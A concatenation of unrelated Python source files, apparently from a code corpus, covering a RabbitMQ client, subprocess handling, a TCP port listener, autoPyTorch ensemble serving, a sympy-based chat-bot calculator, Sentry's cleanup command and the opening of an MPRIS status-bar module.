self.on_connect_callback = None
self.on_register_callback = None
self.on_message_callback = None
def setCallbacks(self, on_connect_callback=None, on_register_callback=None, on_message_callback=None):
if on_connect_callback:
self.on_connect_callback = on_connect_callback
if on_register_callback:
self.on_register_callback = on_register_callback
if on_message_callback:
self.on_message_callback = on_message_callback
def clearCallbacks(self):
self.on_connect_callback = None
self.on_register_callback = None
self.on_message_callback = None
def __enter__(self):
self.connect()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def _generateId(self, size=8, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def _generateAppid(self):
return self._generateId()
def _consumerThreadTask(self):
self.connection.ioloop.start()
def connect(self):
credentials = pika.PlainCredentials(self.user,
self.password)
parameters = pika.ConnectionParameters(self.host,
self.port,
self.vhost,
credentials)
self.connection = pika.SelectConnection(parameters,
self._onConnectionOpen,
stop_ioloop_on_close=False)
self.consumer_thread = threading.Thread(target=self._consumerThreadTask)
self.consumer_thread.start()
def _onConnectionOpen(self, connection):
self.connection.add_on_close_callback(self._onConnectionClosed)
# open a channel
self.connection.channel(on_open_callback=self._onChannelOpen)
def _onConnectionClosed(self, connection, reply_code, reply_text):
self.channel = None
if self.closing:
self.connection.ioloop.stop()
else:
self.connection.add_timeout(5, self.reconnect)
def _onChannelOpen(self, channel):
self.channel = channel
self.channel.add_on_close_callback(self._onChannelClosed)
# declare a queue
self.queue = self.user + "/" + self.appid
self.channel.queue_declare(self._onQueueDeclareok,
queue=self.queue,
durable=False,
exclusive=False,
auto_delete=True)
def _onQueueDeclareok(self, mothod_frame):
# set consumer
self.channel.add_on_cancel_callback(self._onConsumerCancelled)
self.consumer_tag = self.channel.basic_consume(self._onMessage,
queue=self.queue,
no_ack=False)
# call callback
if self.on_connect_callback:
self.on_connect_callback()
# register automatically
if self.auto_reregistration:
if self.acceptors:
self.register(self.acceptors)
def _onChannelClosed(self, channel, reply_code, reply_text):
if self.registration_timer:
self.registration_timer.cancel()
self.registration_timer = None
self.connection.close()
def _onConsumerCancelled(self, method_frame):
if self.channel:
self.channel.close()
def _onMessage(self, channel, method, properties, body):
# acknowledge
self.channel.basic_ack(method.delivery_tag)
# call callback
# check if a message is registration message
if bms_registration_result.isRegistrationJson(body):
if self.on_register_callback:
self.on_register_callback(bms_registration_result.fromJson(body))
else:
if self.on_message_callback:
self.on_message_callback(body)
def reconnect(self):
self.connection.ioloop.stop()
if not self.closing:
self.connection = self.connect()
def close(self):
self.closing = True
if self.channel:
self.channel.basic_cancel(self._onCancelok, self.consumer_tag)
self.connection.ioloop.start()
self.connection.close()
self.consumer_thread = None
def _onCancelok(self, unused_frame):
self.channel.close()
def reRegister(self):
if self.channel:
if self.registration_msg:
self._registerByString(self.registration_msg)
def _registerByString(self, msg):
self.registration_msg = msg
# set a message property
prop = pika.BasicProperties(reply_to=self.queue)
# request a registration
self.channel.basic_publish(exchange=BMS_REGISTRATION_EXCHANGE,
routing_key=BMS_REGISTRATION_QUEUE,
properties=prop,
body=msg)
if self.registration_timer:
self.registration_timer.cancel()
if self.auto_reregistration:
self.registration_timer = threading.Timer(BMS_REREGISTRATION_SEC, self.reRegister)
self.registration_timer.start()
def register(self, acceptors):
# make a registration message
"""
reg_msg = {"request": "lease",
"client": {"user_id": self.user,
"application_name": self.appid},
"acceptors": [{"acceptor": "path",
"pattern": "/iplant/home/iychoi/*"}] }
"""
acceptor_arr = []
for acceptor in acceptors:
acceptor_arr.append(acceptor.asDict())
reg_msg = {"request": "lease",
"client": {"user_id": self.user,
"application_name": self.appid},
"acceptors": acceptor_arr}
reg_msg_str = json.dumps(reg_msg)
self._registerByString(reg_msg_str)
|
process_handler.py | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import multiprocessing
import os
import StringIO
import sys
from abc import abstractmethod
import six
from pants.util.meta import AbstractClass
# Expose subprocess with python 3.2+ capabilities (namely timeouts) and bugfixes from this module.
# NB: As recommended here: https://github.com/google/python-subprocess32/blob/master/README.md
# which accounts for non-posix, ie: Windows. Although we don't support Windows yet, this sets the
# pattern up in anticipation.
if os.name == 'posix' and six.PY2:
import subprocess32 as subprocess3
else:
import subprocess as subprocess3
subprocess = subprocess3
class ProcessHandler(AbstractClass):
"""An abstraction of process handling calls using the same interface as subprocess(32).Popen.
See SubprocessProcessHandler below for an example.
"""
@abstractmethod
def wait(self, timeout=None):
"""Wait for the underlying process to terminate.
:param float timeout: The time to wait for the process to terminate in fractional seconds. Wait
forever by default.
:returns: The process exit code is it has terminated.
:rtype: int
:raises: :class:`subprocess.TimeoutExpired`
"""
@abstractmethod
def kill(self):
pass
@abstractmethod
def terminate(self):
pass
@abstractmethod
def poll(self):
pass
class SubprocessProcessHandler(ProcessHandler):
"""A `ProcessHandler` that delegates directly to a subprocess(32).Popen object."""
def __init__(self, process):
self._process = process
def wait(self, timeout=None):
return self._process.wait(timeout=timeout)
def kill(self):
return self._process.kill()
def terminate(self):
return self._process.terminate()
def poll(self):
return self._process.poll()
def communicate_teeing_stdout_and_stderr(self, stdin=None):
"""
Just like subprocess.communicate, but tees stdout and stderr to both sys.std{out,err} and a
buffer. Only operates on stdout/stderr if the Popen call send them to subprocess.PIPE.
:param stdin: A string to send to the stdin of the subprocess.
:return: (stdout, stderr) as strings.
"""
if stdin is not None and self._process.stdin is not None:
self._process.stdin.write(stdin)
def fork_tee(infile, outfile):
if infile is None:
return lambda: None
queue = multiprocessing.Queue()
process = multiprocessing.Process(target=_tee, args=(infile, outfile, queue.put))
process.start()
def join_and_get_output():
process.join()
return queue.get()
return join_and_get_output
stdout = fork_tee(self._process.stdout, sys.stdout)
stderr = fork_tee(self._process.stderr, sys.stderr)
self._process.wait()
return stdout(), stderr()
def _tee(infile, outfile, return_function):
accumulator = StringIO.StringIO()
for line in iter(infile.readline, ""):
accumulator.write(line)
outfile.write(line)
infile.close()
return_function(accumulator.getvalue())
|
report_error.py | #
# General-purpose Photovoltaic Device Model - a drift diffusion base/Shockley-Read-Hall
# model for 1st, 2nd and 3rd generation solar cells.
# Copyright (C) 2008-2022 Roderick C. I. MacKenzie r.c.i.mackenzie at googlemail.com
#
# https://www.gpvdm.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License v2.0, as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
## @package report_error
# Report an error using a thread.
#
import os
from win_lin import running_on_linux
from threading import Thread
import platform
from gpvdm_http import get_data_from_web
import hashlib
from sim_warnings import sim_warnings
import i18n
_ = i18n.language.gettext
from const_ver import const_ver
#qt
from PyQt5.QtCore import QSize, Qt
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QWidget
from PyQt5.QtGui import QPixmap
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtWidgets import QWidget
from urllib.parse import quote
from PyQt5.QtCore import QTimer
from lock import get_lock
class report_error(QWidget):
reported = pyqtSignal(bool)
def __init__(self):
QWidget.__init__(self)
self.error=""
def tx_error(self,n):
get_lock().report_bug(self.error)
self.reported.emit(True)
def set_error(self,error):
self.error=error
def start(self):
p = Thread(target=self.tx_error, args=(10,))
p.daemon = True
p.start()
|
port_listener.py | #!/usr/bin/python3
"""
Point of this script is to spawn TCP servers based on
configuration provided in proper file in etc.
"""
import socketserver
import json
import threading
import argparse
IP = "0.0.0.0"
CONFIG = {}
def start_listener(listener_data):
"""
Wrapper function to start TCP server.
Args:
listener_data (tuple): data for TCP server to start
"""
server = socketserver.TCPServer(listener_data, MyTCPHandler)
server.timeout = 3
server.serve_forever()
class MyTCPHandler(socketserver.BaseRequestHandler):
"""
Handler to serve a response to asking client
"""
def handle(self):
"""
Handling function. It reads proper response from config dict
based on port which is added to object in default constructor
"""
print("Incomiong connection on port {}".format(
str(self.server.server_address[1])))
self.request.sendall(
bytes(" ".join(
CONFIG[str(self.server.server_address[1])]), "utf-8"))
if __name__ == "__main__":
PARSER = argparse.ArgumentParser()
PARSER.add_argument('-c', '--config',
help="Config file for service",
default="/etc/port-listener.json", type=str)
ARGS = PARSER.parse_args()
CONFIG_PATH = ARGS.config
with open(CONFIG_PATH, 'r') as infile:
CONFIG = json.loads(infile.read())
SERVICES = [(IP, int(i)) for i in CONFIG.keys()]
THREADS = []
for service in SERVICES:
print("Binding to port {}".format(service[1]))
t = threading.Thread(target=start_listener, args=[service])
t.daemon = True
t.start()
THREADS.append(t)
THREADS[0].join()
|
ensemble.py | import os
import time
import numpy as np
import json
import math
import tempfile
import uuid
import asyncio
import multiprocessing
import signal
import logging
from autoPyTorch.components.ensembles.ensemble_selection import EnsembleSelection
def build_ensemble(result, optimize_metric,
ensemble_size, all_predictions, labels, model_identifiers,
only_consider_n_best=0, sorted_initialization_n_best=0):
id2config = result.get_id2config_mapping()
ensemble_selection = EnsembleSelection(ensemble_size, optimize_metric,
only_consider_n_best=only_consider_n_best, sorted_initialization_n_best=sorted_initialization_n_best)
# fit ensemble
ensemble_selection.fit(np.array(all_predictions), labels, model_identifiers)
ensemble_configs = dict()
for identifier in ensemble_selection.get_selected_model_identifiers():
ensemble_configs[tuple(identifier[:3])] = id2config[tuple(identifier[:3])]["config"]
return ensemble_selection, ensemble_configs
def read_ensemble_prediction_file(filename, y_transform):
all_predictions = list()
all_timestamps = list()
labels = None
model_identifiers = list()
with open(filename, "rb") as f:
labels = np.load(f)
labels, _ = y_transform(labels)
while True:
try:
job_id, budget, timestamps = np.load(f)
predictions = np.load(f)
model_identifiers.append(job_id + (budget, ))
predictions = np.array(predictions)
all_predictions.append(predictions)
all_timestamps.append(timestamps)
except (EOFError, OSError):
break
return all_predictions, labels, model_identifiers, all_timestamps
class test_predictions_for_ensemble():
def __init__(self, autonet, X_test, Y_test):
self.autonet = autonet
self.X_test = X_test
self.Y_test = Y_test
from autoPyTorch.core.api import AutoNet
self.predict = AutoNet.predict
def __call__(self, model, epochs):
if self.Y_test is None or self.X_test is None:
return float("nan")
return self.predict(self.autonet, self.X_test, return_probabilities=True)[1], self.Y_test
def combine_predictions(data, pipeline_kwargs, X, Y):
all_indices = None
all_predictions = None
for split, predictions in data.items():
if (np.any(np.isnan(predictions))):
logging.getLogger("autonet").warn("Not saving predictions containing nans")
return None
indices = pipeline_kwargs[split]["valid_indices"]
assert len(predictions) == len(indices), "Different number of predictions and indices:" + str(len(predictions)) + "!=" + str(len(indices))
all_indices = indices if all_indices is None else np.append(all_indices, indices)
all_predictions = predictions if all_predictions is None else np.vstack((all_predictions, predictions))
argsort = np.argsort(all_indices)
sorted_predictions = all_predictions[argsort]
sorted_indices = all_indices[argsort]
unique = uuid.uuid4()
tempfile.gettempdir()
with open(os.path.join(tempfile.gettempdir(), "autonet_ensemble_predictions_%s.npy" % unique), "wb") as f:
np.save(f, sorted_predictions)
with open(os.path.join(tempfile.gettempdir(), "autonet_ensemble_labels_%s.npy" % unique), "wb") as f:
np.save(f, Y[sorted_indices])
host, port = pipeline_kwargs[0]["pipeline_config"]["ensemble_server_credentials"]
return host, port, unique
def combine_test_predictions(data, pipeline_kwargs, X, Y):
predictions = [d[0] for d in data.values() if d == d]
labels = [d[1] for d in data.values() if d == d]
assert all(np.all(labels[0] == l) for l in labels[1:])
assert len(predictions) == len(labels)
if len(predictions) == 0:
return None
unique = uuid.uuid4()
tempfile.gettempdir()
with open(os.path.join(tempfile.gettempdir(), "autonet_ensemble_predictions_%s.npy" % unique), "wb") as f:
np.save(f, np.stack(predictions))
with open(os.path.join(tempfile.gettempdir(), "autonet_ensemble_labels_%s.npy" % unique), "wb") as f:
np.save(f, labels[0])
host, port = pipeline_kwargs[0]["pipeline_config"]["ensemble_server_credentials"]
return host, port, unique
def filter_nan_predictions(predictions, *args):
nan_predictions = set([i for i, p in enumerate(predictions) if np.any(np.isnan(p))])
return [
[x for i, x in enumerate(vector) if i not in nan_predictions] if vector is not None else None
for vector in [predictions, *args]
]
async def serve_predictions(reader, writer):
data = await reader.read(1024)
name, unique = data.decode().split("_")
# logging.getLogger("autonet").info("Serve %s %s" % (name, unique))
with open(os.path.join(tempfile.gettempdir(), "autonet_ensemble_%s_%s.npy" % (name, unique)), "rb") as f:
while True:
buf = f.read(1024)
if not buf:
break
writer.write(buf)
os.remove(os.path.join(tempfile.gettempdir(), "autonet_ensemble_%s_%s.npy" % (name, unique)))
if name == "predictions" and os.path.exists(os.path.join(tempfile.gettempdir(), "autonet_ensemble_labels_%s.npy" % unique)):
os.remove(os.path.join(tempfile.gettempdir(), "autonet_ensemble_labels_%s.npy" % unique))
await writer.drain()
writer.close()
def _start_server(host, queue):
def shutdown(signum, stack):
raise KeyboardInterrupt
signal.signal(signal.SIGTERM, shutdown)
loop = asyncio.get_event_loop()
coro = asyncio.start_server(serve_predictions, host, 0, loop=loop)
server = loop.run_until_complete(coro)
host, port = server.sockets[0].getsockname()
queue.put((host, port))
try:
loop.run_forever()
except KeyboardInterrupt:
pass
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
# logging.getLogger("autonet").info("Ensemble Server has been shut down")
def start_server(host):
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=_start_server, args=(host, queue))
p.start()
host, port = queue.get()
p.shutdown = p.terminate
return host, port, p
class ensemble_logger(object):
def __init__(self, directory, overwrite):
self.start_time = time.time()
self.directory = directory
self.overwrite = overwrite
self.labels_written = False
self.test_labels_written = False
self.file_name = os.path.join(directory, 'predictions_for_ensemble.npy')
self.test_file_name = os.path.join(directory, 'test_predictions_for_ensemble.npy')
try:
with open(self.file_name, 'x') as fh: pass
except FileExistsError:
if overwrite:
with open(self.file_name, 'w') as fh: pass
else:
raise FileExistsError('The file %s already exists.'%self.file_name)
except:
raise
try:
with open(self.test_file_name, 'x') as fh: pass
except FileExistsError:
if overwrite:
with open(self.test_file_name, 'w') as fh: pass
else:
raise FileExistsError('The file %s already exists.'%self.test_file_name)
except:
raise
def new_config(self, *args, **kwargs):
pass
async def save_remote_data(self, host, port, name, unique, f):
remote_reader, remote_writer = await asyncio.open_connection(host, port)
remote_writer.write(("%s_%s" % (name, unique)).encode())
while not remote_reader.at_eof():
f.write(await remote_reader.read(1024))
remote_writer.close()
def __call__(self, job):
if job.result is None:
return
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
if "predictions_for_ensemble" in job.result and job.result["predictions_for_ensemble"] is None and \
"test_predictions_for_ensemble" in job.result and job.result["test_predictions_for_ensemble"] is not None:
host, port, unique = job.result["test_predictions_for_ensemble"]
with open("/dev/null", "wb") as f:
loop.run_until_complete(self.save_remote_data(host, port, "predictions", unique, f))
if "predictions_for_ensemble" in job.result and job.result["predictions_for_ensemble"] is not None:
host, port, unique = job.result["predictions_for_ensemble"]
with open(self.file_name, "ab") as f:
if not self.labels_written:
loop.run_until_complete(self.save_remote_data(host, port, "labels", unique, f))
self.labels_written = True
np.save(f, np.array([job.id, job.kwargs['budget'], job.timestamps], dtype=object))
loop.run_until_complete(self.save_remote_data(host, port, "predictions", unique, f))
del job.result["predictions_for_ensemble"]
if "test_predictions_for_ensemble" in job.result and job.result["test_predictions_for_ensemble"] is not None:
host, port, unique = job.result["test_predictions_for_ensemble"]
with open(self.test_file_name, "ab") as f:
if not self.test_labels_written:
loop.run_until_complete(self.save_remote_data(host, port, "labels", unique, f))
self.test_labels_written = True
np.save(f, np.array([job.id, job.kwargs['budget'], job.timestamps], dtype=object))
loop.run_until_complete(self.save_remote_data(host, port, "predictions", unique, f))
del job.result["test_predictions_for_ensemble"]
loop.close() |
arithmetic.py | #!/usr/bin/env python3
import re, random
import token
import multiprocessing
import sympy
from sympy.core import numbers
from sympy.parsing.sympy_parser import parse_expr, standard_transformations, implicit_multiplication, implicit_application
from sympy.parsing.sympy_tokenize import TokenError
from sympy.physics import units
from .utilities import BasePlugin
ALLOWED_TOKENS = {
token.ENDMARKER, token.NAME, token.NUMBER, token.STRING, token.LPAR,
token.RPAR, token.LSQB, token.RSQB, token.COMMA, token.PLUS,
token.MINUS, token.STAR, token.SLASH, token.VBAR, token.AMPER,
token.LESS, token.GREATER, token.PERCENT, token.LBRACE, token.RBRACE,
token.EQEQUAL, token.NOTEQUAL, token.LESSEQUAL, token.GREATEREQUAL, token.TILDE,
token.CIRCUMFLEX, token.LEFTSHIFT, token.RIGHTSHIFT, token.DOUBLESTAR, token.DOUBLESLASH,
token.AT,
}
ALLOWED_OPS = {"(", ")", "[", "]", ",", "+", "-", "*", "/", "|", "&", "<", ">", "%", "{", "}", "==", "!=", "<=", ">=", "~", "^", "<<", ">>", "**", "//", "@"}
ALLOWED_NAMESPACE = {
name: getattr(sympy, name) for name in
{"Abs", "E", "Eq", "Float", "I", "Integer", "Symbol", "acos", "acosh", "acot", "acoth", "acsc", "asec", "asech", "asin", "asinh", "atan", "atan2", "atanh", "ceiling", "comp", "compose", "conjugate", "cos", "cosh", "cot", "coth", "csc", "csch", "decompose", "deg", "degree", "denom", "diff", "div", "divisors", "exp", "expand", "factor", "factorial", "false", "floor", "gamma", "gcd", "im", "integrate", "invert", "is_decreasing", "is_increasing", "is_monotonic", "is_strictly_decreasing", "is_strictly_increasing", "isolate", "isprime", "latex", "lcm", "li", "limit", "limit_seq", "ln", "log", "nan", "nroots", "nsimplify", "nsolve", "numer", "oo", "pi", "primefactors", "prod", "product", "quo", "rad", "re", "real_roots", "refine", "refine_root", "rem", "roots", "satisfiable", "sec", "sech", "sign", "simplify", "sin", "sinc", "sinh", "solve", "sqrt", "subsets", "summation", "tan", "tanh", "to_cnf", "to_dnf", "to_nnf", "true"}
}
ALLOWED_NAMESPACE.update({
name: getattr(units, name) for name in dir(units)
if type(getattr(units, name)) in [units.dimensions.Dimension, units.prefixes.Prefix, units.quantities.Quantity]
})
def whitelist_tokens(tokens, local_dict, global_dict):
for token_type, token_value in tokens:
if token_type in ALLOWED_TOKENS:
continue
if token_type == token.OP and token_value in ALLOWED_OPS:
continue
raise TokenError("forbidden token {}".format(token_type))
return tokens
def evaluate_with_time_limit(text, time_limit=1):
def evaluate(queue, text):
subs = {
sympy.Symbol(k): v for k, v in units.__dict__.items()
if (isinstance(v, sympy.Expr) and v.has(units.Unit)) or isinstance(v, sympy.Integer)
}
try:
transformations = (whitelist_tokens,) + standard_transformations + (implicit_multiplication, implicit_application)
expression = parse_expr(text, local_dict=ALLOWED_NAMESPACE, global_dict={}, transformations=transformations)
simplified_expression = sympy.simplify(expression)
queue.put(simplified_expression)
except Exception as e:
queue.put(e)
# run the evaluator in a separate process in order to enforce time limits
queue = multiprocessing.SimpleQueue()
process = multiprocessing.Process(target=evaluate, args=(queue, text))
process.start()
process.join(time_limit)
if process.is_alive() or queue.empty():
process.terminate()
return None
return queue.get()
class ArithmeticPlugin(BasePlugin):
"""
Symbolic mathematics plugin for Botty.
This uses Sympy for computation and implements evaluation timeouts by spawning a child process and killing it if it takes too much time.
Example invocations:
#general | Me: ca sqrt(20)
#general | Botty: sqrt(20) :point_right: 2*sqrt(5) :point_right: 4.4721359549995793928183473374625524708812367192230514485417944908210418512756098
#general | Me: calculate integrate(1/x, x)
#general | Botty: integrate(1/x, x) :point_right: log(x)
#general | Me: calculate 1kg meter/second**2 + 2 newtons
#general | Botty: 1kg meter/second**2 + 2 newtons :point_right: 3*kg*m/s**2
#general | Me: eval solve(Eq(x**2, 6), x)
#general | Botty: solve(Eq(x**2, 6), x) :point_right: [-sqrt(6), sqrt(6)]
"""
def __init__(self, bot):
super().__init__(bot)
def on_message(self, m):
if not m.is_user_text_message: return False
match = re.search(r"^\s*\b(?:ca(?:lc(?:ulate)?)?|eval(?:uate)?)\s+(.+)", m.text, re.IGNORECASE)
if not match: return False
query = self.sendable_text_to_text(match.group(1)) # get query as plain text in order to make things like < and > work (these are usually escaped)
expression = evaluate_with_time_limit(query)
if isinstance(expression, Exception): # evaluation resulted in error
message = random.choice(["s a d e x p r e s s i o n s", "wat", "results hazy, try again later", "cloudy with a chance of thunderstorms", "oh yeah, I learned all about that in my sociology class", "eh too lazy, get someone else to do it", "would you prefer the truth or a lie?", "nice try", "you call that an expression?"])
self.respond_raw("{} ({})".format(message, expression), as_thread=True)
elif expression is None: # evaluation timed out
self.respond_raw("tl;dr", as_thread=True)
else: # evaluation completed successfully
if hasattr(expression, "evalf") and not isinstance(expression, numbers.Integer) and not isinstance(expression, numbers.Float):
value = expression.evalf(80)
if value == sympy.zoo: formatted_value = "(complex infinity)"
elif value == sympy.oo: formatted_value = "\u221e"
else: formatted_value = str(value)
if str(value) == str(expression) or str(query) == str(expression): self.respond_raw("{} :point_right: {}".format(query, formatted_value))
else: self.respond_raw("{} :point_right: {} :point_right: {}".format(query, expression, formatted_value))
else:
self.respond_raw("{} :point_right: {}".format(query, expression))
return True
if __name__ == "__main__":
print(evaluate_with_time_limit("integrate(1/x, x)"))
print(evaluate_with_time_limit("1+/a"))
print(evaluate_with_time_limit("1kg meter/second**2 + 2 newtons"))
|
cleanup.py | from __future__ import absolute_import, print_function
import os
from datetime import timedelta
from uuid import uuid4
import click
from django.utils import timezone
from sentry.runner.decorators import log_options
from six.moves import xrange
# allows services like tagstore to add their own (abstracted) models
# to cleanup
EXTRA_BULK_QUERY_DELETES = []
def get_project(value):
from sentry.models import Project
try:
if value.isdigit():
return int(value)
if '/' not in value:
return None
org, proj = value.split('/', 1)
return Project.objects.get_from_cache(
organization__slug=org,
slug=proj,
).id
except Project.DoesNotExist:
return None
# We need a unique value to indicate when to stop multiprocessing queue
# an identity on an object() isn't guaranteed to work between parent
# and child proc
_STOP_WORKER = '91650ec271ae4b3e8a67cdc909d80f8c'
API_TOKEN_TTL_IN_DAYS = 30
def multiprocess_worker(task_queue):
# Configure within each Process
import logging
from sentry.utils.imports import import_string
logger = logging.getLogger('sentry.cleanup')
configured = False
while True:
j = task_queue.get()
if j == _STOP_WORKER:
task_queue.task_done()
return
# On first task, configure Sentry environment
if not configured:
from sentry.runner import configure
configure()
from sentry import models
from sentry import deletions
from sentry import similarity
skip_models = [
# Handled by other parts of cleanup
models.Event,
models.EventMapping,
models.EventAttachment,
models.UserReport,
models.Group,
models.GroupEmailThread,
models.GroupRuleStatus,
# Handled by TTL
similarity.features,
] + [b[0] for b in EXTRA_BULK_QUERY_DELETES]
configured = True
model, chunk = j
model = import_string(model)
try:
task = deletions.get(
model=model,
query={'id__in': chunk},
skip_models=skip_models,
transaction_id=uuid4().hex,
)
while True:
if not task.chunk():
break
except Exception as e:
logger.exception(e)
finally:
task_queue.task_done()
@click.command()
@click.option('--days', default=30, show_default=True, help='Numbers of days to truncate on.')
@click.option('--project', help='Limit truncation to only entries from project.')
@click.option(
'--concurrency',
type=int,
default=1,
show_default=True,
help='The total number of concurrent worker processes to run.'
)
@click.option(
'--silent', '-q', default=False, is_flag=True, help='Run quietly. No output on success.'
)
@click.option('--model', '-m', multiple=True)
@click.option('--router', '-r', default=None, help='Database router')
@click.option(
'--timed',
'-t',
default=False,
is_flag=True,
help='Send the duration of this command to internal metrics.'
)
@log_options()
def cleanup(days, project, concurrency, silent, model, router, timed):
"""Delete a portion of trailing data based on creation date.
All data that is older than `--days` will be deleted. The default for
this is 30 days. In the default setting all projects will be truncated
but if you have a specific project you want to limit this to this can be
done with the `--project` flag which accepts a project ID or a string
with the form `org/project` where both are slugs.
"""
if concurrency < 1:
click.echo('Error: Minimum concurrency is 1', err=True)
raise click.Abort()
os.environ['_SENTRY_CLEANUP'] = '1'
# Make sure we fork off multiprocessing pool
# before we import or configure the app
from multiprocessing import Process, JoinableQueue as Queue
pool = []
task_queue = Queue(1000)
for _ in xrange(concurrency):
p = Process(target=multiprocess_worker, args=(task_queue,))
p.daemon = True
p.start()
pool.append(p)
from sentry.runner import configure
configure()
from django.db import router as db_router
from sentry.app import nodestore
from sentry.db.deletion import BulkDeleteQuery
from sentry import models
if timed:
import time
from sentry.utils import metrics
start_time = time.time()
# list of models which this query is restricted to
model_list = {m.lower() for m in model}
def is_filtered(model):
if router is not None and db_router.db_for_write(model) != router:
return True
if not model_list:
return False
return model.__name__.lower() not in model_list
# Deletions that use `BulkDeleteQuery` (and don't need to worry about child relations)
# (model, datetime_field, order_by)
BULK_QUERY_DELETES = [
(models.EventMapping, 'date_added', '-date_added'),
(models.EventAttachment, 'date_added', None),
(models.UserReport, 'date_added', None),
(models.GroupEmailThread, 'date', None),
(models.GroupRuleStatus, 'date_added', None),
] + EXTRA_BULK_QUERY_DELETES
# Deletions that use the `deletions` code path (which handles their child relations)
# (model, datetime_field, order_by)
DELETES = (
(models.Event, 'datetime', 'datetime'),
(models.Group, 'last_seen', 'last_seen'),
)
if not silent:
click.echo('Removing expired values for LostPasswordHash')
if is_filtered(models.LostPasswordHash):
if not silent:
click.echo('>> Skipping LostPasswordHash')
else:
models.LostPasswordHash.objects.filter(
date_added__lte=timezone.now() - timedelta(hours=48)
).delete()
if not silent:
click.echo('Removing expired values for OrganizationMember')
if is_filtered(models.OrganizationMember):
if not silent:
click.echo('>> Skipping OrganizationMember')
else:
expired_threshold = timezone.now() - timedelta(days=days)
models.OrganizationMember.delete_expired(expired_threshold)
for model in [models.ApiGrant, models.ApiToken]:
if not silent:
click.echo(u'Removing expired values for {}'.format(model.__name__))
if is_filtered(model):
if not silent:
click.echo(u'>> Skipping {}'.format(model.__name__))
else:
queryset = model.objects.filter(
expires_at__lt=(timezone.now() - timedelta(days=API_TOKEN_TTL_IN_DAYS)),
)
# SentryAppInstallations are associated to ApiTokens. We're okay
# with these tokens sticking around so that the Integration can
# refresh them, but all other non-associated tokens should be
# deleted.
if model is models.ApiToken:
queryset = queryset.filter(sentry_app_installation__isnull=True)
queryset.delete()
project_id = None
if project:
click.echo(
"Bulk NodeStore deletion not available for project selection", err=True)
project_id = get_project(project)
if project_id is None:
click.echo('Error: Project not found', err=True)
raise click.Abort()
else:
if not silent:
click.echo("Removing old NodeStore values")
cutoff = timezone.now() - timedelta(days=days)
try:
nodestore.cleanup(cutoff)
except NotImplementedError:
click.echo(
"NodeStore backend does not support cleanup operation", err=True)
for bqd in BULK_QUERY_DELETES:
if len(bqd) == 4:
model, dtfield, order_by, chunk_size = bqd
else:
chunk_size = 10000
model, dtfield, order_by = bqd
if not silent:
click.echo(
u"Removing {model} for days={days} project={project}".format(
model=model.__name__,
days=days,
project=project or '*',
)
)
if is_filtered(model):
if not silent:
click.echo('>> Skipping %s' % model.__name__)
else:
BulkDeleteQuery(
model=model,
dtfield=dtfield,
days=days,
project_id=project_id,
order_by=order_by,
).execute(chunk_size=chunk_size)
for model, dtfield, order_by in DELETES:
if not silent:
click.echo(
u"Removing {model} for days={days} project={project}".format(
model=model.__name__,
days=days,
project=project or '*',
)
)
if is_filtered(model):
if not silent:
click.echo('>> Skipping %s' % model.__name__)
else:
imp = '.'.join((model.__module__, model.__name__))
q = BulkDeleteQuery(
model=model,
dtfield=dtfield,
days=days,
project_id=project_id,
order_by=order_by,
)
for chunk in q.iterator(chunk_size=100):
task_queue.put((imp, chunk))
task_queue.join()
# Clean up FileBlob instances which are no longer used and aren't super
# recent (as there could be a race between blob creation and reference)
if not silent:
click.echo("Cleaning up unused FileBlob references")
if is_filtered(models.FileBlob):
if not silent:
click.echo('>> Skipping FileBlob')
else:
cleanup_unused_files(silent)
# Shut down our pool
for _ in pool:
task_queue.put(_STOP_WORKER)
# And wait for it to drain
for p in pool:
p.join()
if timed:
duration = int(time.time() - start_time)
metrics.timing('cleanup.duration', duration, instance=router, sample_rate=1.0)
click.echo("Clean up took %s second(s)." % duration)
def cleanup_unused_files(quiet=False):
"""
Remove FileBlob's (and thus the actual files) if they are no longer
referenced by any File.
We set a minimum-age on the query to ensure that we don't try to remove
any blobs which are brand new and potentially in the process of being
referenced.
"""
from sentry.models import File, FileBlob, FileBlobIndex
if quiet:
from sentry.utils.query import RangeQuerySetWrapper
else:
from sentry.utils.query import RangeQuerySetWrapperWithProgressBar as RangeQuerySetWrapper
cutoff = timezone.now() - timedelta(days=1)
queryset = FileBlob.objects.filter(
timestamp__lte=cutoff,
)
for blob in RangeQuerySetWrapper(queryset):
if FileBlobIndex.objects.filter(blob=blob).exists():
continue
if File.objects.filter(blob=blob).exists():
continue
blob.delete()
|
mpris.py | """
Display song/video and control MPRIS compatible players.
There are two ways to control the media player. Either by clicking with a mouse
button in the text information or by using buttons. For former you have
to define the button parameters in your config.
Configuration parameters:
button_next: mouse button to play the next entry (default None)
button_previous: mouse button to play the previous entry (default None)
button_stop: mouse button to stop the player (default None)
button_toggle: mouse button to toggle between play and pause mode (default 1)
format: see placeholders below
format: display format for this module
(default '[{artist} - ][{title}] {previous} {toggle} {next}')
format_none: define output if no player is running
(default 'no player running')
icon_next: specify icon for next button (default u'\u25b9')
icon_pause: specify icon for pause button (default u'\u25eb')
icon_play: specify icon for play button (default u'\u25b7')
icon_previous: specify icon for previous button (default u'\u25c3')
icon_stop: specify icon for stop button (default u'\u25a1')
player_priority: priority of the players.
Keep in mind that the state has a higher priority than
player_priority. So when player_priority is "[mpd, bomi]" and mpd is
paused and bomi is playing than bomi wins. (default [])
state_pause: specify icon for pause state (default u'\u25eb')
state_play: specify icon for play state (default u'\u25b7')
state_stop: specify icon for stop state (default u'\u25a1')
Format placeholders:
{album} album name
{artist} artiste name (first one)
{length} time duration of the song
{player} show name of the player
{state} playback status of the player
